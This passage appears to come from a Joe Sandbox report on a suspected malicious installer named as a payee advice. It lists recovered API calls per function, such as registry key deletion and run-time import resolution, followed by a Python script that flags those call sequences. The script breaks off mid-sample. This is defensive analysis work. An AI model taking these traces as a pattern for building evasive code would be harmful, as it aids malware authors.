                                                                                                                                          • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                            • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                          • String ID: 9
                                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                                          • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                          • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                          • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                          • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3294113728-0
                                                                                                                                          • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                          • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                          • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                          • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                          • String ID:
• API String ID: 2531174081-0
• Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
• Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
• Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
• Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00001794), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
• Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• GetMessagePos.USER32 ref: 00404A81
• ScreenToClient.USER32(?,?), ref: 00404A9B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
• Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
APIs
• GetDC.USER32(?), ref: 00401D44
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
• ReleaseDC.USER32(?,00000000), ref: 00401D71
• CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Times New Roman
• API String ID: 3808545654-927190056
• Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
• Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
• Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
• Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
• wsprintfW.USER32 ref: 00402CD1
• SetWindowTextW.USER32(?,?), ref: 00402CE1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
• Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
APIs
• lstrlenW.KERNEL32(?), ref: 10002391
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
• CLSIDFromString.OLE32(?,00000000), ref: 100023BF
• GlobalAlloc.KERNEL32(00000040), ref: 100023DD
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
• GlobalFree.KERNEL32(00000000), ref: 1000241A
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
• String ID:
• API String ID: 3579998418-0
• Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
• Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
• Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
• Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
APIs
• wsprintfW.USER32 ref: 100024E1
• StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
  • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7591FFC0,100011AA,?,00000000), ref: 1000131E
• GlobalFree.KERNEL32(?), ref: 10002559
• GlobalFree.KERNEL32(00000000), ref: 10002582
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: FreeGlobal$FromStringlstrcpywsprintf
• String ID:
• API String ID: 2435812281-0
• Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
• Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
• Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
• Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 176019282-0
                                                                                                                                          • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                          • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                          • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                          • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
• RegCloseKey.ADVAPI32(?), ref: 00402BE0
• RegCloseKey.ADVAPI32(?), ref: 00402C05
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
• Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
• Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
• Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
• GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
• GlobalFree.KERNEL32(00000000), ref: 1000165A
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
• Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
• Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
• Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
• Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
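Two of the records above are the ones a triage analyst would open first: the ADVAPI32 function that walks RegOpenKeyExW, RegEnumKeyW and RegDeleteKeyW (enumerate-then-delete on a registry key), and the KERNEL32 function directly above that converts a wide string with WideCharToMultiByte, allocates a buffer and hands the result to GetProcAddress (an import resolved by name at run time, which is what the "Contains functionality to dynamically determine API calls" signature in the report header refers to). The following is an added example, not Joe Sandbox's code and not code from the sample: it parses "APIs" records in the format printed on this page and flags both call sequences with an ordered-subsequence match. The rule names, the API sets in RULES and the trimmed SAMPLE text are this example's own constructions.

```python
"""Added example (not Joe Sandbox code): parse the "APIs" records of an IDA
plugin listing like this page and flag ordered call sequences behind two of the
report's signatures.  RULES and SAMPLE are this example's own assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One "APIs" bullet, with or without an argument list or a "subcall" prefix.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_LINE = re.compile(r"^•\s*Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")

@dataclass
class Call:
    api: str
    module: str
    args: str            # raw argument list as printed by the report ("" if none)
    ref: int             # call-site address
    subcall: int | None  # callee address when the line is "Part of subcall function"

@dataclass
class Function:
    calls: list[Call] = field(default_factory=list)
    base: int | None = None   # image base from "Source File ... Offset:"

    @property
    def entry_ref(self) -> int:
        """Lowest direct call-site address, used as the function's label."""
        return min([c.ref for c in self.calls if c.subcall is None]
                   or [c.ref for c in self.calls])

def parse_listing(text: str) -> list[Function]:
    """One Function per "APIs" ... "Source File" record; indentation is ignored."""
    funcs: list[Function] = []
    cur: Function | None = None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            cur = Function()
            funcs.append(cur)
        elif cur is None:
            continue
        elif (m := API_LINE.match(line)):
            cur.calls.append(Call(m["api"], m["mod"], m["args"] or "", int(m["ref"], 16),
                                  int(m["sub"], 16) if m["sub"] else None))
        elif (m := SOURCE_LINE.match(line)):
            cur.base = int(m["base"], 16)
            cur = None           # the source line closes the record
    return [f for f in funcs if f.calls]

# Each rule is a list of steps; a function matches when one API from every step
# appears in its call list in step order (unrelated calls may sit in between).
# These sets are a triage heuristic chosen for this example, not a vendor signature.
RULES: dict[str, list[set[str]]] = {
    "dynamic api resolution":  # run-time-built import name handed to GetProcAddress
        [{"WideCharToMultiByte", "MultiByteToWideChar", "lstrcpyW", "wsprintfW"},
         {"GetProcAddress"}],
    "registry enumerate-and-delete":  # RegEnumKey feeding RegDeleteKey
        [{"RegOpenKeyExW", "RegOpenKeyExA"}, {"RegEnumKeyW", "RegEnumKeyExW"},
         {"RegDeleteKeyW", "RegDeleteKeyExW"}],
}

def matches_in_order(calls: list[Call], steps: list[set[str]]) -> bool:
    """Ordered-subsequence match over the function's call list."""
    i = 0
    for c in calls:
        if i < len(steps) and c.api in steps[i]:
            i += 1
    return i == len(steps)

def scan(text: str) -> list[tuple[str, int, int | None]]:
    """(rule, function entry address, image base) for every matching record."""
    return [(rule, f.entry_ref, f.base) for f in parse_listing(text)
            for rule, steps in RULES.items() if matches_in_order(f.calls, steps)]

# Constructed sample: three records trimmed from this page, indented as in the report.
SAMPLE = r"""
    APIs
      • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
      • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
    • GlobalFree.KERNEL32(?), ref: 10001928
    Memory Dump Source
    • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
    • RegCloseKey.ADVAPI32(?), ref: 00402BE0
    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
    Memory Dump Source
    • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    APIs
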